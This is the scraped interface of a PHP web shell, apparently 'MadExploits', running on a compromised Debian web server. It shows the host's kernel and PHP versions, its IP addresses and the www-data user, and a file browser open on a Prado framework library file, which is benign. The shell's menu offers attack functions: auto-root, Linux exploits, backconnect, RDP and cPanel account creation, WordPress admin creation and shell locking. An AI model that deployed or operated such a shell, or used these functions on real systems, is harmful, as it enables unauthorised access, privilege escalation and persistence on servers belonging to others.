Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.22.242.169
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Util /
Behaviors /
[ HOME SHELL ]
Name
Size
Permission
Action
TBehaviorParameterLoader.php
9.54
KB
-rw-r--r--
TMapLazyLoadBehavior.php
1.78
KB
-rw-r--r--
TMapRouteBehavior.php
3.46
KB
-rw-r--r--
TPageGlobalizationCharsetBehav...
2.22
KB
-rw-r--r--
TPageNoCacheBehavior.php
2.6
KB
-rw-r--r--
TPageTopAnchorBehavior.php
1.64
KB
-rw-r--r--
TParameterizeBehavior.php
8
KB
-rw-r--r--
TTimeZoneParameterBehavior.php
3.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TMapLazyLoadBehavior.php
<?php /** * TMapLazyLoadBehavior class file. * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Util\Behaviors; use Prado\Util\TBehavior; use Prado\Exceptions\TInvalidDataTypeException; /** * TMapLazyLoadBehavior class. * * TMapLazyLoadBehavior handles Application Parameters when there is * no parameter key found. This allows for lazy loading of the parameter. * <code> * Prado::getApplication()->getParameters()->attachBehavior('name' * new TMapLazyLoadBehavior([$obj, 'getParam'])); * </code> * This behavior will call $obj->getParam($key) every time the key * is not found in the TMap or TPriorityMap. * * @author Brad Anderson <belisoful@icloud.com> * @since 4.2.0 */ class TMapLazyLoadBehavior extends TBehavior { /** * @var callable the parameter to check for when there are changes */ private $_handler; /** * @param callable $handler the handler for setting the parameter */ public function __construct($handler) { if (!is_callable($handler)) { throw new TInvalidDataTypeException('maplazyloadbehavior_handler_not_callable'); } $this->_handler = $handler; parent::__construct(); } /** * This is the dynamic event for handling TMap dyAddItem. * This calls handler($key). * @param mixed $value the value of the item being added * @param string $key the key of the item being added * @param \Prado\Util\TCallChain $callchain {@link TCallChain} of event handlers * @return mixed returns the argv[0], chained to all handlers */ public function dyNoItem($value, $key, $callchain) { if (($nvalue = call_user_func($this->_handler, $key)) !== null) { $value = $nvalue; } return $callchain->dyNoItem($value, $key); } }
Close